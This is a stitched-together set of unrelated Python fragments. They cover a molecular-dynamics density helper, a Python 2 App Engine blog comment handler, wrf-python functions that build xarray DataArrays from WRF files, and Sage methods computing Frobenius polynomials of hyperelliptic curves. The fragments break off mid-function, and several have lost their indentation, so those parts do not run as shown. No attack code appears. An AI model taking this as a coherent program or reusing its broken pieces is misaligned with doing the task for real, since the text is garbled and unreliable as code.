    return center_of_mass(t.xyz[:, ndx, :], mass)  # determine center of mass trajectories
def compdensity(coord, pore_centers, box, cut=1.5, nbins=50, spline=False):
""" Measure the density of a component as a function of the distance from | |
child
del_comment_session_val(c_child)
c_child.delete()
# Delete the master parent, 'curr_comment'
del_comment_session_val(c)
c.delete()
# Call recursive delete on current comment entity
del_curr_comment(curr_comment)
except LookupError:
print (""""Error deleting comments and
associated replies....""")
finally:
print ("""Done handling comment delete...
submitting output of result.""")
# Check to make sure comment is delete
comment_check = Comment.get_by_id(long(self.comment_id))
print "Comment Check returned: %s" % comment_check
# Redirect if Comment instance deleted successfully
if comment_check is None:
# Clear any messages
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
# Set success msg
self.web_obj.set_main_msg(('''Success in deleting
COMMENT for Post: "%s"''')
% post_subject)
self.web_obj.set_msg_type("notice")
# Update session variable
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/welcome")
else:
print "DELETE of COMMENT instance failed!"
# Case 3: USER is NOT Owner of COMMENT here. So Can't DELETE
else:
print ("""ERROR in DELETING comment instance with
logged in and valid user...""")
# Display error message indicating they need to
# be comment owner to delete
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
self.web_obj.set_main_msg("""You can ONLY delete your
own comments...""")
self.web_obj.set_msg_type("error")
# Update session variables
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/welcome")
class EditCommentHandler:
    """Handles editing an existing blog-post comment (Python 2 / GAE).

    Wraps a web handler (web_obj) that supplies the session, messaging,
    render and redirect helpers.  Only the comment's owner may edit it.
    """

    def __init__(self, web_obj, comment_id, comment_body,
                 post_id, initial_render=None):
        # web_obj: request handler providing session/render/redirect helpers.
        # initial_render: "true" when the edit form is being shown for the
        # first time (pre-populated from the datastore).
        self.web_obj = web_obj
        self.comment_id = comment_id
        self.comment_body = comment_body
        self.post_id = post_id
        self.initial_render = initial_render

    def finalize_edit(self, post_subject, curr_comment, comment_body, user):
        """
        Persist the edited comment body and notify the user.

        No login check/validation is repeated here: this method is only
        reached through class methods (it has no endpoint of its own), and
        existing endpoints authenticate before this point.  If user were
        None we simply would not update anything.
        """
        # User at this point would be VALID and IS LOGGED IN
        # We can proceed to save the edited comment
        if user:
            # Use the values from the passed request
            print ("""Post comment body received...
                   Performing Update...""")
            curr_comment.comment = comment_body
            curr_comment.put()
            # Check to make sure comment still exists
            comment_check = (
                Comment.get_by_id(long(self.comment_id)))
            print "Comment Check returned: %s" % comment_check
            # Notify if we can't find Comment
            # instance for some reason
            if comment_check is None:
                print "CANNOT find Comment instance!"
            else:
                print "SUCCESS Editing Comment instance!"
                # display notices indicating success
                self.web_obj.clear_main_msg()
                self.web_obj.clear_msg_type()
                self.web_obj.set_main_msg('''Success in
                                          editing COMMENT
                                          for Post: "%s"''' %
                                          post_subject)
                self.web_obj.set_msg_type("notice")
                # Update session variables
                self.web_obj.session["messages_viewed"] = 0
                self.web_obj._set_jinja_variable_session()
                self.web_obj.redirect("/blog/welcome")

    def edit_comment(self):
        """Entry point: validate auth/ownership, then render the edit form
        (empty/initial body) or finalize the edit (non-empty body)."""
        print "IN: EditCommentHandler.edit_comment()"
        self.web_obj.session["curr_handler"] = "EditCommentHandler"
        curr_comment = Comment.get_by_id(long(self.comment_id))
        parent_post = Post.get_by_id(long(self.post_id))
        # Used for user output later (truncated subject for messages)
        post_subject = parent_post.subject[:20]
        comment_form_error = ""
        try:
            # Clear any stale per-comment form error left in the session.
            post_comm_tag = ("post_%s_comment_%s_form_error" %
                             (self.post_id, self.comment_id))
            if self.web_obj.session.get(post_comm_tag) is not None:
                # Clear our Comment Form Errors
                self.web_obj.clear_commentform_errors(self.comment_id,
                                                      self.post_id)
                # Clear our Main MSG area
                self.web_obj.clear_main_msg()
        except LookupError:
            print "Nothing exists in COMMENT_FORM_ERROR value in session."
        print ("EDIT Comment received...")
        # Check for logged in/valid user
        auth = Authenticator(self.web_obj)
        auth_check = auth.authenticate()
        # Set our base variables based on Auth result
        user = auth_check.get("user")
        user_logged_in = auth_check.get("user_logged_in")
        user_valid = auth_check.get("user_valid")
        # Case 1: User is NOT logged in, or NOT valid
        if user_logged_in is False and user_valid is False:
            print "Either NOT Logged In, or NOT Valid..."
            # set error message for user
            try:
                self.web_obj.session["post_%s_comment_%s_form_error" %
                                     (self.post_id, self.comment_id)] = (
                    """MUST Login to EDIT a COMMENT!""")
                self.web_obj.set_main_msg("""Please <a href='/blog/login'>
                                          Login</a> to EDIT COMMENT for post:
                                          '%s...'""" % post_subject)
                self.web_obj.set_msg_type("error")
                self.web_obj.session["messages_viewed"] = 0
                self.web_obj._set_jinja_variable_session()
                self.web_obj.redirect("/blog/login")
            except LookupError:
                print "Cannot add session variables for EDIT comment action"
                print "USER Not Logged In....for EDIT comment"
        # Case 2: User IS LOGGED IN and VALID
        if user_logged_in is True and user_valid is True:
            # Comment Edit, ensure comment is not NONE
            if curr_comment is not None:
                # Then we can edit this comment, if they are comment owner
                # OWNER CHECK
                if curr_comment.created_by == user.username:
                    print "User is OWNER of Comment. *CAN* Edit"
                    # EDIT COMMENT HERE
                    if self.comment_body is None or self.comment_body == "":
                        # Render our EditComment Page for comment editing
                        if (self.initial_render == "true"):
                            # Set our default form values to
                            # what is in datastore
                            self.comment_body = curr_comment.comment
                        comment_validation = ""
                        validation_error = False
                        if self.comment_body == "":
                            comment_validation = ("""Comment must
                                                  contain TEXT body
                                                  before submit...""")
                            validation_error = True
                        main_user_msgs = ""
                        msg_type = None
                        if validation_error is True:
                            print ("""We have a validation error....
                                   So setting main message...""")
                            self.web_obj.clear_main_msg()
                            self.web_obj.clear_msg_type()
                            self.web_obj.set_main_msg("""Edit COMMENT
                                                      values missing...""")
                            self.web_obj.set_msg_type("error")
                            main_user_msgs = self.web_obj.get_main_msg()
                            msg_type = self.web_obj.get_msg_type()
                            # Update session variable
                            self.web_obj.session["messages_viewed"] = 1
                        self.web_obj._set_jinja_variable_session()
                        # Render our EDIT comment form
                        self.web_obj.render("editcomment.html",
                                            post=parent_post,
                                            comment=curr_comment,
                                            comment_body=self.comment_body,
                                            comment_validation=(
                                                comment_validation),
                                            main_user_msgs=main_user_msgs,
                                            msg_type=msg_type)
                    else:
                        # Finalize our EDIT and submit to DataStore
                        self.finalize_edit(post_subject, curr_comment,
                                           self.comment_body, user)
                # USER is NOT OWNER of COMMENT. So can't EDIT
                else:
                    print ("""ERROR in EDITING comment instance with
                           logged in and valid user...""")
                    # Display error message indicating they need
                    # to be comment owner to delete
                    self.web_obj.clear_main_msg()
                    self.web_obj.clear_msg_type()
                    self.web_obj.set_main_msg("""You can ONLY edit your
                                              own comments...""")
                    self.web_obj.set_msg_type("error")
                    # Update session variables
                    self.web_obj.session["messages_viewed"] = 0
                    self.web_obj._set_jinja_variable_session()
                    self.web_obj.redirect("/blog/welcome")
class CommentReplyHandler:
def __init__(self, web_obj, comment_id, post_id, reply_body,
initial_render=None):
self.web_obj = web_obj
self.comment_id = comment_id
self.post_id = post_id
self.reply_body = reply_body
self.initial_render = initial_render
    def __add_reply(self, parent_post, user, parent_comment, reply_body,
                    created_by):
        """
        Create and persist a new Comment entity as a reply to an existing
        comment, then redirect to the post's permalink page.

        No login check/validation is repeated here: this method is only
        called through class methods (it has no endpoint of its own), and
        existing endpoints authenticate before this point.  If user were
        None we simply would not add a reply.
        """
        # User at this point would be VALID and IS LOGGED IN
        # We can proceed to add our NEW reply
        if user:
            # Replies are Comment entities linked to the parent comment
            # via comment_parent.
            c = Comment(post=parent_post, user=user,
                        comment_parent=parent_comment,
                        comment=reply_body,
                        created_by=created_by)
            key = c.put()
            # Do a quick verify of add
            new_reply = Comment.get(key)
            print "New Reply is: %s" % new_reply
            # Update session to reflect user as reply
            # (i.e. a comment object) OWNER
            self.web_obj.session["post_%s_comment_%s_owner" %
                                 (parent_post.key().id(),
                                  c.key().id())] = "true"
            self.web_obj._set_jinja_variable_session()
            # Redirect to blog post permalink page which displays
            # all comments and replies
            self.web_obj.redirect("/blog/%s" % parent_post.key().id())
def get_reply_frm(self):
print "IN: CommentReplyHandler.get_reply_frm()"
# OUR PARENT objects
parent_comment = Comment.get_by_id(long(self.comment_id))
parent_post = Post.get_by_id(long(self.post_id))
last_handler = None
messages_viewed = 0
try:
last_handler = self.web_obj.session.get("curr_handler")
messages_viewed = self.web_obj.session.get("messages_viewed")
except LookupError:
print "No Last Handler or Errors Viewed values exist..."
finally:
self.web_obj.session["curr_handler"] = "CommentReplyHandler"
# Refresh our stored jinja inkpenbam session variable
stored_jinja_session = self.web_obj._get_jinja_variable_session()
if stored_jinja_session is None:
self.web_obj._set_jinja_variable_session()
# Get referrer source
source = self.web_obj.get_ref_source()
if source is not None:
if messages_viewed == 1:
# Clear any previous session messages to display a clean page
print "Previously displayed errors. So clearing..."
self.web_obj.clear_main_msg()
# Get User MSGS to display
main_user_msgs = self.web_obj.get_main_msg()
msg_type = self.web_obj.get_msg_type()
# Used for user output later
post_subject = parent_post.subject[:20]
# Check for logged in/valid user
auth = Authenticator(self.web_obj)
auth_check = auth.authenticate()
# Set our base variables based on Auth result
user = auth_check.get("user")
user_logged_in = auth_check.get("user_logged_in")
user_valid = auth_check.get("user_valid")
# Case 1: User is NOT LOGGED In, or NOT Valid
if user_logged_in is False or user_valid is False:
self.web_obj.set_main_msg("""You need to <a href='/blog/login'>
Login</a> to REPLY to a
post comment.""")
self.web_obj.set_msg_type("error")
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/login")
# Case 2: User IS LOGGED IN and VALID
if user_logged_in is True and user_valid is True:
# Set some default values
reply_validation = ""
validation_error = False
main_user_msgs = ""
msg_type = None
created_by = user.username
if self.reply_body is None and self.initial_render == "true":
# We can just skip out initial form validation
print "Initial REPLY-FORM-REQUEST received..."
self.reply_body = ""
else:
# Then our user is submitting an actual reply,
# from the form
# PEFORM some validation
if self.reply_body == "":
reply_validation = ("""Reply must contain REPLY
text before submit...""")
validation_error = True
if validation_error is True:
print ("""We have a validation error....
Setting msg for our user...""")
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
self.web_obj.set_main_msg("Reply values are missing...")
self.web_obj.set_msg_type("error")
main_user_msgs = self.web_obj.get_main_msg()
msg_type = self.web_obj.get_msg_type()
# Update session variables
self.web_obj.session["messages_viewed"] = 1
self.web_obj._set_jinja_variable_session()
if self.reply_body == "" or validation_error is True:
# Render our Reply Form in either case
self.web_obj.render("newcomment-reply.html",
reply_validation=reply_validation,
main_user_msgs=main_user_msgs,
msg_type=msg_type, post=parent_post,
comment=parent_comment,
post_subject=post_subject,
reply=self.reply_body)
elif self.reply_body != | |
in _TIME_COORD_VARS if name in coords][0]
except IndexError:
xtime_coord = None
return lat_coord, lon_coord, xtime_coord
def _find_max_time_size(wrfseq):
    """Return the maximum number of times found in a sequence of
    WRF files.

    Args:

        wrfseq (sequence): A sequence of WRF NetCDF file objects.

    Returns:

        :obj:`int`: The maximum number of times found in a file.

    """
    # A plain for loop performs exactly the iter()/next()/StopIteration
    # protocol the original spelled out by hand, and the built-in max()
    # replaces the manual conditional comparison.
    max_times = 0
    for wrfnc in wrfseq:
        max_times = max(max_times, extract_dim(wrfnc, "Time"))

    return max_times
def _get_coord_names(wrfin, varname):
    """Return the latitude, longitude, and time coordinate variable names
    for *varname*, with None for any coordinate that cannot be determined.

    Handles plain WRF files (via the ``coordinates`` attribute), coordinate
    variables themselves, met_em files (via the ``stagger`` attribute), and
    old WRF files that lack both attributes.
    """
    # Need only the first real file
    if is_multi_file(wrfin):
        if not is_mapping(wrfin):
            wrfnc = next(iter(wrfin))
        else:
            # For a mapping, recurse into the first entry's sequence.
            entry = wrfin[next(iter(viewkeys(wrfin)))]
            return _get_coord_names(entry, varname)
    else:
        wrfnc = wrfin

    lat_coord = None
    lon_coord = None
    time_coord = None

    var = wrfnc.variables[varname]

    # WRF variables will have a coordinates attribute. MET_EM files have
    # a stagger attribute which indicates the coordinate variable.
    try:
        # WRF files
        coord_attr = getattr(var, "coordinates")
    except AttributeError:
        if is_coordvar(varname):
            # Coordinate variable (most likely XLAT or XLONG)
            lat_coord, lon_coord = get_coord_pairs(varname)
            time_coord = None
            if has_time_coord(wrfnc):
                time_coord = "XTIME"
        elif is_time_coord_var(varname):
            # Time coordinate variables carry no lat/lon/time coordinates.
            lon_coord = None
            lat_coord = None
            time_coord = None
        else:
            try:
                # met_em files or old WRF files
                stag_attr = getattr(var, "stagger")
            except AttributeError:
                lon_coord = None
                lat_coord = None
                # Let's just check for xlat and xlong in this case
                if "XLAT" in wrfnc.variables:
                    lat_coord = "XLAT"
                    lon_coord = "XLONG"
            else:
                # For met_em files, use the stagger name to get the lat/lon var
                lat_coord = "XLAT_{}".format(stag_attr)
                lon_coord = "XLONG_{}".format(stag_attr)
            # If this coord name is missing, it might be an old WRF file
            if lat_coord not in wrfnc.variables:
                lat_coord = None
                lon_coord = None
                if "XLAT" in wrfnc.variables:
                    lat_coord = "XLAT"
                    lon_coord = "XLONG"
    else:
        # scipy.io.netcdf may hand back bytes; normalize to str before split.
        if isinstance(coord_attr, str):
            coord_names = coord_attr.split()
        else:
            coord_names = coord_attr.decode().split()
        lon_coord = coord_names[0]
        lat_coord = coord_names[1]
        try:
            time_coord = coord_names[2]
        except IndexError:
            time_coord = None
        else:
            # Make sure they time variable wasn't removed
            try:
                _ = wrfnc.variables[time_coord]
            except KeyError:
                time_coord = None

    return lat_coord, lon_coord, time_coord
def _build_data_array(wrfnc, varname, timeidx, is_moving_domain, is_multifile,
                      _key):
    """Return a :class:`xarray.DataArray` object for the desired variable in
    a single NetCDF file object.

    Args:

        wrfnc (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`): A single
            WRF NetCDF file object.

        varname (:obj:`str`) : The variable name.

        timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
            desired time index. This value can be a positive integer,
            negative integer, or
            :data:`wrf.ALL_TIMES` (an alias for None) to return
            all times in the file or sequence. The default is 0.

        is_moving_domain (:obj:`bool`): A boolean type that indicates if the
            NetCDF file object came from a moving nest.

        is_multifile (:obj:`bool`): A boolean type that indicates if the NetCDF
            file object came from a sequence.

        _key (:obj:`int`, optional): Cache key for the coordinate variables.
            This is used for internal purposes only. Default is None.

    Returns:

        :class:`xarray.DataArray`: An array object that contains metadata.

    """
    # Note: wrfnc is always a single netcdf file object
    # is_moving_domain and is_multifile are arguments indicating if the
    # single file came from a sequence, and if that sequence is has a moving
    # domain. Both arguments are used mainly for coordinate extraction and
    # caching.
    multitime = is_multi_time_req(timeidx)
    time_idx_or_slice = timeidx if not multitime else slice(None)
    var = wrfnc.variables[varname]
    if len(var.shape) > 1:
        data = var[time_idx_or_slice, :]
    else:
        data = var[time_idx_or_slice]

    # Want to preserve the time dimension
    if not multitime:
        if len(var.shape) > 1:
            data = data[np.newaxis, :]
        else:
            data = data[np.newaxis]

    # Copy the variable's NetCDF attributes, skipping bookkeeping entries
    # and decoding byte strings where needed.
    attrs = OrderedDict()
    for dkey, val in viewitems(var.__dict__):
        # scipy.io adds these but don't want them
        if dkey in ("data", "_shape", "_size", "_typecode", "_attributes",
                    "maskandscale", "dimensions"):
            continue
        _dkey = dkey if isinstance(dkey, str) else dkey.decode()
        if isstr(val):
            _val = val
        else:
            if isinstance(val, bytes):
                _val = val.decode()  # scipy.io.netcdf
            else:
                _val = val
        attrs[_dkey] = _val

    dimnames = var.dimensions[-data.ndim:]

    lat_coord = lon_coord = time_coord = None

    # Only look up coordinate names for 2D+ south_north/west_east fields;
    # IndexError means the variable has fewer than two dimensions.
    try:
        if dimnames[-2] == "south_north" and dimnames[-1] == "west_east":
            lat_coord, lon_coord, time_coord = _get_coord_names(wrfnc, varname)
    except IndexError:
        pass

    coords = OrderedDict()

    # Handle lat/lon coordinates and projection information if available
    if lon_coord is not None and lat_coord is not None:
        # Using a cache for coordinate variables so the extraction only happens
        # once.
        lon_coord_dimkey = lon_coord + "_dim"
        lon_coord_valkey = lon_coord + "_val"
        lat_coord_dimkey = lat_coord + "_dim"
        lat_coord_valkey = lat_coord + "_val"

        lon_coord_dims = get_cached_item(_key, lon_coord_dimkey)
        lon_coord_vals = get_cached_item(_key, lon_coord_valkey)
        if lon_coord_dims is None or lon_coord_vals is None:
            lon_var = wrfnc.variables[lon_coord]
            lon_coord_dims = lon_var.dimensions
            lon_coord_vals = lon_var[:]

            # Only cache here if the domain is not moving, otherwise
            # caching is handled by cat/join
            if not is_moving_domain:
                cache_item(_key, lon_coord_dimkey, lon_coord_dims)
                cache_item(_key, lon_coord_valkey, lon_coord_vals)

        lat_coord_dims = get_cached_item(_key, lat_coord_dimkey)
        lat_coord_vals = get_cached_item(_key, lat_coord_valkey)
        if lat_coord_dims is None or lat_coord_vals is None:
            lat_var = wrfnc.variables[lat_coord]
            lat_coord_dims = lat_var.dimensions
            lat_coord_vals = lat_var[:]

            # Only cache here if the domain is not moving, otherwise
            # caching is done in cat/join
            if not is_moving_domain:
                cache_item(_key, lat_coord_dimkey, lat_coord_dims)
                cache_item(_key, lat_coord_valkey, lat_coord_vals)

        time_coord_vals = None
        if time_coord is not None:
            # If not from a multifile sequence, then cache the time
            # coordinate.  Otherwise, handled in cat/join/
            if not is_multifile:
                time_coord_vals = get_cached_item(_key, time_coord)

                if time_coord_vals is None:
                    time_coord_vals = wrfnc.variables[time_coord][:]

                    # NOTE(review): this inner check is always true on this
                    # branch; it appears to be defensive/redundant.
                    if not is_multifile:
                        cache_item(_key, time_coord, time_coord_vals)
            else:
                time_coord_vals = wrfnc.variables[time_coord][:]

        if multitime:
            if is_moving_domain:
                # Special case with a moving domain in a multi-time file,
                # otherwise the projection parameters don't change
                coords[lon_coord] = lon_coord_dims, lon_coord_vals
                coords[lat_coord] = lat_coord_dims, lat_coord_vals
            else:
                # Static domain: lat/lon are identical at every time, so
                # drop the leading time dimension and use time step 0.
                coords[lon_coord] = (lon_coord_dims[1:],
                                     lon_coord_vals[0,:])
                coords[lat_coord] = (lat_coord_dims[1:],
                                     lat_coord_vals[0,:])

            if time_coord is not None:
                coords[time_coord] = (lon_coord_dims[0], time_coord_vals)
        else:
            # Single time request: slice the coordinates at timeidx.
            coords[lon_coord] = (lon_coord_dims[1:],
                                 lon_coord_vals[timeidx,:])
            coords[lat_coord] = (lat_coord_dims[1:],
                                 lat_coord_vals[timeidx,:])

            if time_coord is not None:
                coords[time_coord] = (lon_coord_dims[0],
                                      [time_coord_vals[timeidx]])

    proj_params = get_proj_params(wrfnc)
    proj = getproj(**proj_params)
    attrs["projection"] = proj

    if dimnames[0] == "Time":
        t = extract_times(wrfnc, timeidx, meta=False, do_xtime=False)
        if not multitime:
            t = [t]
        coords[dimnames[0]] = t

    data_array = DataArray(data, name=varname, dims=dimnames, coords=coords,
                           attrs=attrs)

    return data_array
def _find_forward(wrfseq, varname, timeidx, is_moving, meta, _key):
    """Find and return the array object within a sequence for a specific time
    index.

    Walks the sequence front to back, accumulating the number of times per
    file, until the file containing *timeidx* is reached.

    Args:

        wrfseq (iterable): An iterable type, which includes lists, tuples,
            dictionaries, generators, and user-defined classes.

        varname (:obj:`str`) : The variable name.

        timeidx (:obj:`int`): The desired time index. Must be positive.

        is_moving (:obj:`bool`): A boolean type that indicates if the
            sequence is a moving nest.

        meta (:obj:`bool`, optional): Set to False to disable metadata and
            return :class:`numpy.ndarray` instead of
            :class:`xarray.DataArray`. Default is True.

        _key (:obj:`int`, optional): Cache key for the coordinate variables.
            This is used for internal purposes only. Default is None.

    Returns:

        :class:`xarray.DataArray` or :class:`numpy.ndarray`: If xarray is
        enabled and the *meta* parameter is True, then the result will be a
        :class:`xarray.DataArray` object. Otherwise, the result will be a
        :class:`numpy.ndarray` object with no metadata.

    """
    times_consumed = 0
    for wrfnc in wrfseq:
        numtimes = extract_dim(wrfnc, "Time")
        if timeidx >= times_consumed + numtimes:
            # Requested index lies in a later file; keep counting.
            times_consumed += numtimes
            continue

        local_idx = timeidx - times_consumed
        if meta:
            return _build_data_array(wrfnc, varname, local_idx,
                                     is_moving, True, _key)

        var = wrfnc.variables[varname]
        if len(var.shape) > 1:
            result = var[local_idx, :]
            return result[np.newaxis, :]  # So that nosqueeze works
        result = var[local_idx]
        return result[np.newaxis]  # So that nosqueeze works

    raise IndexError("timeidx {} is out of bounds".format(timeidx))
def _find_reverse(wrfseq, varname, timeidx, is_moving, meta, _key):
"""Find and | |
H = HyperellipticCurve(2*t^5 + 2*t + 4)
sage: H.frobenius_polynomial_cardinalities()
x^4 - x^3 - 52*x^2 - 37*x + 1369
Curve over a non-prime field::
sage: K.<z> = GF(7**2)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + z*t + z^2)
sage: H.frobenius_polynomial_cardinalities()
x^4 + 8*x^3 + 70*x^2 + 392*x + 2401
This method may actually be useful when `hypellfrob` does not work::
sage: K = GF(7)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^9 + t^3 + 1)
sage: H.frobenius_polynomial_matrix(algorithm='hypellfrob')
Traceback (most recent call last):
...
ValueError: In the current implementation, p must be greater than (2g+1)(2N-1) = 81
sage: H.frobenius_polynomial_cardinalities()
x^8 - 5*x^7 + 7*x^6 + 36*x^5 - 180*x^4 + 252*x^3 + 343*x^2 - 1715*x + 2401
"""
g = self.genus()
q = self.base_ring().cardinality()
if a is None:
# this may actually call frobenius_polynomial()
a = self.count_points(g)
# maybe calling count_points_exhaustive() would make more sense
# but the method is currently only called with a precomputed list
# of number of points so it does not really matter
# computation of the reciprocal polynomial
s = [ai - q**(i+1) - 1 for i, ai in enumerate(a)]
coeffs = [1]
for i in range(1, g + 1):
c = 0
for j in range(i):
c += s[i-1-j]*coeffs[j]
coeffs.append(c/i)
coeffs = coeffs + [coeffs[g-i] * q**(i) for i in range(1, g + 1)]
return ZZ['x'](coeffs).reverse()
    def frobenius_polynomial_matrix(self, M=None, algorithm='hypellfrob'):
        r"""
        Compute the charpoly of frobenius, as an element of `\ZZ[x]`,
        by computing the charpoly of the frobenius matrix.

        This is currently only supported when the base field is prime
        and large enough using the ``hypellfrob`` library.

        EXAMPLES::

            sage: R.<t> = PolynomialRing(GF(37))
            sage: H = HyperellipticCurve(t^5 + t + 2)
            sage: H.frobenius_polynomial_matrix()
            x^4 + x^3 - 52*x^2 + 37*x + 1369

        A quadratic twist::

            sage: H = HyperellipticCurve(2*t^5 + 2*t + 4)
            sage: H.frobenius_polynomial_matrix()
            x^4 - x^3 - 52*x^2 - 37*x + 1369

        Curves defined over larger prime fields::

            sage: K = GF(49999)
            sage: R.<t> = PolynomialRing(K)
            sage: H = HyperellipticCurve(t^9 + t^5 + 1)
            sage: H.frobenius_polynomial_matrix()
            x^8 + 281*x^7 + 55939*x^6 + 14144175*x^5 + 3156455369*x^4 + 707194605825*x^3 + 139841906155939*x^2 + 35122892542149719*x + 6249500014999800001
            sage: H = HyperellipticCurve(t^15 + t^5 + 1)
            sage: H.frobenius_polynomial_matrix()  # long time, 8s on a Corei7
            x^14 - 76*x^13 + 220846*x^12 - 12984372*x^11 + 24374326657*x^10 - 1203243210304*x^9 + 1770558798515792*x^8 - 74401511415210496*x^7 + 88526169366991084208*x^6 - 3007987702642212810304*x^5 + 3046608028331197124223343*x^4 - 81145833008762983138584372*x^3 + 69007473838551978905211279154*x^2 - 1187357507124810002849977200076*x + 781140631562281254374947500349999

        This ``hypellfrob`` program doesn't support non-prime fields::

            sage: K.<z> = GF(37**3)
            sage: R.<t> = PolynomialRing(K)
            sage: H = HyperellipticCurve(t^9 + z*t^3 + 1)
            sage: H.frobenius_polynomial_matrix(algorithm='hypellfrob')
            Traceback (most recent call last):
            ...
            NotImplementedError: Computation of Frobenius matrix only implemented for hyperelliptic curves defined over prime fields.
        """
        K = self.base_ring()
        p = K.characteristic()
        q = K.cardinality()
        g = self.genus()
        N = self._frobenius_coefficient_bound_charpoly()
        # NOTE(review): the ``M`` parameter is never read -- it is
        # immediately rebound below.  Confirm whether it should be honored
        # or deprecated.
        # compute charpoly over ZZ and then reduce back
        # (because charpoly of p-adic matrices sometimes loses precision)
        M = self.frobenius_matrix(N=N, algorithm=algorithm).change_ring(ZZ)
        # get a_g, ..., a_0 in ZZ (i.e. with correct signs)
        f = M.charpoly().list()[g:2*g+1]
        ppow = p**N
        # Coefficients are only known modulo p^N; lift each to the balanced
        # representative so the signs come out correctly.
        f = [x % ppow for x in f]
        f = [x if 2*x < ppow else x - ppow for x in f]
        # get a_{2g}, ..., a_{g+1} -- the upper coefficients are determined
        # by the lower ones (mirrored and scaled by powers of q).
        f = [f[g-i] * q**(g-i) for i in range(g)] + f
        return ZZ['x'](f)
    def frobenius_polynomial_pari(self):
        r"""
        Compute the charpoly of frobenius, as an element of `\ZZ[x]`,
        by calling the PARI function ``hyperellcharpoly``.

        EXAMPLES::

            sage: R.<t> = PolynomialRing(GF(37))
            sage: H = HyperellipticCurve(t^5 + t + 2)
            sage: H.frobenius_polynomial_pari()
            x^4 + x^3 - 52*x^2 + 37*x + 1369

        A quadratic twist::

            sage: H = HyperellipticCurve(2*t^5 + 2*t + 4)
            sage: H.frobenius_polynomial_pari()
            x^4 - x^3 - 52*x^2 - 37*x + 1369

        Slightly larger example::

            sage: K = GF(2003)
            sage: R.<t> = PolynomialRing(K)
            sage: H = HyperellipticCurve(t^7 + 487*t^5 + 9*t + 1)
            sage: H.frobenius_polynomial_pari()
            x^6 - 14*x^5 + 1512*x^4 - 66290*x^3 + 3028536*x^2 - 56168126*x + 8036054027

        Curves defined over a non-prime field are supported as well::

            sage: K.<a> = GF(7^2)
            sage: R.<t> = PolynomialRing(K)
            sage: H = HyperellipticCurve(t^5 + a*t + 1)
            sage: H.frobenius_polynomial_pari()
            x^4 + 4*x^3 + 84*x^2 + 196*x + 2401

            sage: K.<z> = GF(23**3)
            sage: R.<t> = PolynomialRing(K)
            sage: H = HyperellipticCurve(t^3 + z*t + 4)
            sage: H.frobenius_polynomial_pari()
            x^2 - 15*x + 12167

        Over prime fields of odd characteristic, `h` may be non-zero::

            sage: K = GF(101)
            sage: R.<t> = PolynomialRing(K)
            sage: H = HyperellipticCurve(t^5 + 27*t + 3, t)
            sage: H.frobenius_polynomial_pari()
            x^4 + 2*x^3 - 58*x^2 + 202*x + 10201
        """
        # PARI's hyperellcharpoly takes the pair [f, h] describing the model
        # y^2 + h(x)*y = f(x); coerce its result back into ZZ[x].
        f, h = self.hyperelliptic_polynomials()
        return ZZ['x'](pari([f, h]).hyperellcharpoly())
@cached_method
def frobenius_polynomial(self):
r"""
Compute the charpoly of frobenius, as an element of `\ZZ[x]`.
EXAMPLES::
sage: R.<t> = PolynomialRing(GF(37))
sage: H = HyperellipticCurve(t^5 + t + 2)
sage: H.frobenius_polynomial()
x^4 + x^3 - 52*x^2 + 37*x + 1369
A quadratic twist::
sage: H = HyperellipticCurve(2*t^5 + 2*t + 4)
sage: H.frobenius_polynomial()
x^4 - x^3 - 52*x^2 - 37*x + 1369
Slightly larger example::
sage: K = GF(2003)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^7 + 487*t^5 + 9*t + 1)
sage: H.frobenius_polynomial()
x^6 - 14*x^5 + 1512*x^4 - 66290*x^3 + 3028536*x^2 - 56168126*x + 8036054027
Curves defined over a non-prime field of odd characteristic,
or an odd prime field which is too small compared to the genus,
are supported via PARI::
sage: K.<z> = GF(23**3)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^3 + z*t + 4)
sage: H.frobenius_polynomial()
x^2 - 15*x + 12167
sage: K.<z> = GF(3**3)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + z*t + z**3)
sage: H.frobenius_polynomial()
x^4 - 3*x^3 + 10*x^2 - 81*x + 729
Over prime fields of odd characteristic, `h` may be non-zero::
sage: K = GF(101)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + 27*t + 3, t)
sage: H.frobenius_polynomial()
x^4 + 2*x^3 - 58*x^2 + 202*x + 10201
Over prime fields of odd characteristic, `f` may have even degree::
sage: H = HyperellipticCurve(t^6 + 27*t + 3)
sage: H.frobenius_polynomial()
x^4 + 25*x^3 + 322*x^2 + 2525*x + 10201
In even characteristic, the naive algorithm could cover all cases
because we can easily check for squareness in quotient rings of
polynomial rings over finite fields but these rings unfortunately
do not support iteration::
sage: K.<z> = GF(2**5)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + z*t + z**3, t)
sage: H.frobenius_polynomial()
x^4 - x^3 + 16*x^2 - 32*x + 1024
"""
K = self.base_ring()
e = K.degree()
q = K.cardinality()
g = self.genus()
f, h = self.hyperelliptic_polynomials()
if (e == 1 and
q >= (2*g+1)*(2*self._frobenius_coefficient_bound_charpoly()-1) and
h == 0 and f.degree() % 2):
return self.frobenius_polynomial_matrix()
elif q % 2 == 1:
return self.frobenius_polynomial_pari()
else:
return self.frobenius_polynomial_cardinalities()
def _points_fast_sqrt(self):
"""
List points by enumerating over x and solving the resulting
quadratic for y.
EXAMPLES::
sage: K.<a> = GF(9, 'a')
sage: x = polygen(K)
sage: C = HyperellipticCurve(x^7 - 1, x^2 + a)
sage: C._points_fast_sqrt()
[(0 : 1 : 0), (a : 2*a + 1 : 1), (2 : a + 1 : 1), (2*a + 2 : 2*a : 1), (2*a + 2 : 1 : 1), (1 : 2*a + 2 : 1), (1 : 0 : 1)]
sage: K.<a> = GF(49, 'a')
sage: x = polygen(K)
